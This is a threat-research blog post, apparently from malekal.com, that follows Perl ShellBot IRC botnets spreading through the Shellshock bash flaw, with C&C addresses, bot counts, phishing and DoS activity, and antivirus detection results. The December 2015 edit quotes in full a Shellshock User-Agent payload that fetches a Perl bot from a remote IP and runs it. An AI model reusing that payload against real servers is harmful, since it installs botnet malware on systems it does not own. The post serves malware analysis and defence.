Perl.Shellbot by Shellshock Bash Attack

My first Script kiddie by Shellshock Bash Attack yesterday 🙂

Perl_ShellBot2leading to PHP.ShellBot – server 185.31.209.84

inetnum:        185.31.208.0 – 185.31.209.255
netname:        SIM-NETWORKS
descr:          SIM-Networks Professional Hosting Solutions
country:        DE
admin-c:        SD9104-RIPE
tech-c:         SD9104-RIPE
status:         ASSIGNED PA
mnt-by:         SIMNETWORKS-MNT
source:         RIPE # Filtered
mnt-routes:     SIMNETWORKS-MNT
mnt-domains:    SIMNETWORKS-MNT

Perl_ShellBot6

~713 clients – if bots this is not bad 🙂

Perl_ShellBot

interrestings bots :

Perl_ShellBot3They seems to be Romanian

Perl_ShellBot Perl_ShellBot7

The abuse made a move :

Perl_ShellBot4
and the IRCd has been down

Perl_ShellBot5
need to rebuild everything.

EDIT – 2014 September 28

Another spotted yesterday :

94.102.63.238
~3000 bots :
94.102.63.238_ircd2 94.102.63.238_ircd

Today, the channel is retricted, they reach 3900 bots.
I think, they stop to populate this server.

94.102.63.238_ircd3EDIT – September 30 : zoom on two botnets activities

Group 213.5.67.223

PerlShellBot_Phishing
Install a Shell to sell it :

PerlShellBot_Phishing4

PerlShellBot_Phishing5

but the main activity is Phishing email :

PerlShellBot_Phishing3The script give Spam capability :
PerlShellBot_Phishing6
sdfsdf
PerlShellBot_Phishing9

Some Phishing Example – seems to be Bank Phishing :PerlShellBot_Phishing8

PerlShellBot_Phishing7

a DoS group

Another group from dl.directxex.net/dl/nice.png also spreding by shellshock bash vulnerability

PerlShellBot_DoS_init
that made download other script from ftp://37.59.68.12/pub/ :

PerlShellBot_DoS_init2
PerlShellBot_DoS4connect to 37.59.68.5
PerlShellBot_DoS2This group made DoS Attack.

PerlShellBot_DoS3

PerlShellBot_DoS5

EDIT -2015 February 4

Still Around and same actor.

Two Attempts :

http://www.malekal.com/modsec/index.php?ip=209.236.133.201
http://www.malekal.com/modsec/index.php?ip=64.187.99.130

Two differents scripts but both connect to 46.4.83.92

inetnum: 46.4.83.64 – 46.4.83.95
netname: HETZNER-RZ14
descr: Hetzner Online AG
descr: Datacenter 14
country: DE
admin-c: HOAC1-RIPE
tech-c: HOAC1-RIPE
status: ASSIGNED PA
mnt-by: HOS-GUN
mnt-lower: HOS-GUN
mnt-routes: HOS-GUN
source: RIPE # Filtered

Shellshock_IRC_script2 Shellshock_IRC_script

 

Around 700 bots on this server.

Shellshock_IRC Shellshock_IRC_channels2 Shellshock_IRC_channels

 

EDIT – 2015 December

Still around :

http://www.malekal.com/modsec/index.php?ip=69.12.70.34
http://www.malekal.com/modsec/index.php?ip=67.205.111.9

User-Agent: () { :;}; /bin/bash -c "cd /tmp;lwp-download -a http://188.138.69.229/gnu;curl -O http://188.138.69.229/gnu;wget http://188.138.69.229/gnu;perl /tmp/gnu*;perl gnu;rm -rf /tmp/gnu*"
X-Forwarded-For: 67.205.111.9

The IRCD C&C is at 46.4.132.212
JB_Backdoor_Perl
JB_Backdoor_Perl_2

He is doing Phishing campaign agaist a spanish bank « laCaixa »

JB_Backdoor_Perl_phishing

 

JB_Backdoor_Perl_phishing_2

 

JB_Backdoor_Perl_phishing_3

EDIT – January 2016

Still around, at iweb/privatedns, but no reply from the abuse.
https://twitter.com/malekal_morte/status/673105128757575680
https://twitter.com/malekal_morte/status/565176780869599233

JB_23.95.6.90

Still Phishing :

JB_spam

EDIT : JB is using a backdoor to get another control of bots if IRCd take down.
Dr.WEB does not detected this one, so Plesk are not protected, i will try to make them adding it: https://twitter.com/malekal_morte/status/690597750614953984
I have already sent this backdoor some weeks ago, detection is now 12/54 on VirusTotal.

SHA256: e0b86ff4e89e1a24ae894c71b9d6e30fa1097676c8ef46cede50ab40e34d16d4
Nom du fichier : b.pl
Ratio de détection : 12 / 54
Date d’analyse : 2016-01-25 08:42:51 UTC (il y a 2 minutes)
Antivirus Résultat Mise à jour
Agnitum Perl.Shellbot.T 20160124
Avast PHP:Agent-AO [Trj] 20160125
ClamAV Trojan.Perlscript 20160125
ESET-NOD32 Perl/Small.L 20160125
GData Script.Trojan.Agent.V6OX3T 20160125
Ikarus Trojan.Perl.Small 20160125
McAfee Perl/Generic Backdoor.a 20160125
McAfee-GW-Edition Perl/Generic Backdoor.a 20160125
Microsoft Backdoor:Perl/Small.B 20160125
NANO-Antivirus Trojan.Script.Agent.bowhye 20160125
Qihoo-360 Script/Trojan.25f 20160125
Sophos Troj/CBShell-A 20160125

JB_backdoor
got some IRCd take down, now full in Russia

62.109.19.113 62.109.19.114

and make losing around ~200 bots – seems now it’s hard to him to reach 500 bots.

JB_botnet_500_bots

Comment lire d'autres tutoriels de malekal.com ?

Si le site vous a aidé, svp, débloquez les bloqueurs de publicités, n'hésitez pas non plus à partager l'article ou le site sur les réseaux sociaux.

Pour pouvoir lire plus d'articles et tutoriels, utilisez le menu en haut du site. Plein d'articles et tutos utiles vous attendent !

Besoin d'aide ?

Posez votre question ou soumettez votre problème sur le forum malekal.com pour obtenir une aide efficace : Aller sur le forum malekal.com
(Visited 207 times, 1 visits today)

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *